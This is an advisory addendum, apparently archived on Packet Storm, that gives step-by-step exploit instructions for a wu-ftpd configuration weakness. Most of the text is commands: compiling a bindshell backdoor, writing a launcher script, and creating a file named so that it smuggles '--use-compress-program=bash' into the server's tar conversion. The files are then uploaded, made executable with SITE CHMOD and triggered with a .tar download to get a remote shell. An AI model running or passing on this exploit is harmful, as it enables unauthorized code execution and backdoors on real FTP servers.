SUID Advisory #1 Addendum - Insecure FTP server conventions can lead to remote binary execution on a remote ftp server. Anonymous users or users with valid ftp access only accounts may also execute arbitrary code. Exploit information included.
6085619944c5f878275760fe08277ed6862efad582615db209b144b5776e9d0bsuid@suid.kg - an addendum to wu-ftpd configuration vulnerability exploit information
Background:
In the initial advisory I mentioned that users with valid ftp access only accounts may also
execute arbitrary code. I did not however include exploit information for this. This information is
now found below.
Exploit Information:
With a valid FTP account only the server, the difficulty goes right down. You also have the added
benefit of not being stuck in a chroot() environment at the end. Local exploit time.
The exploit goes along much the same lines as the anonymous FTP exploit does:
Create a backdoor, using bindshell from our previous example:
$ gcc bindshell.c -o b -static
If you can perform a SITE CHMOD (default for normal non-anon users on wu-ftpd), then you can
use the following script example. Create a script to exec the desired commands:
$ cat > blah
#!/bin/bash
./b &
^D
Now create empty file "--use-compress-program=bash blah"
$ > "--use-compress-program=bash blah"
FTP to your target, login with your username/password. Upload your 3 files:
ftp> put b
ftp> put blah
ftp> put "--use-compress-program=bash blah"
Do a SITE CHMOD for b and blah:
ftp> quote SITE CHMOD 0755 b
ftp> quote SITE CHMOD 0755 blah
Now get your file:
ftp> get "--use-compress-program=bash blah".tar
Thats all there is to it. You now should have a shell on whatever port you specified.
Merry Christmas!
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed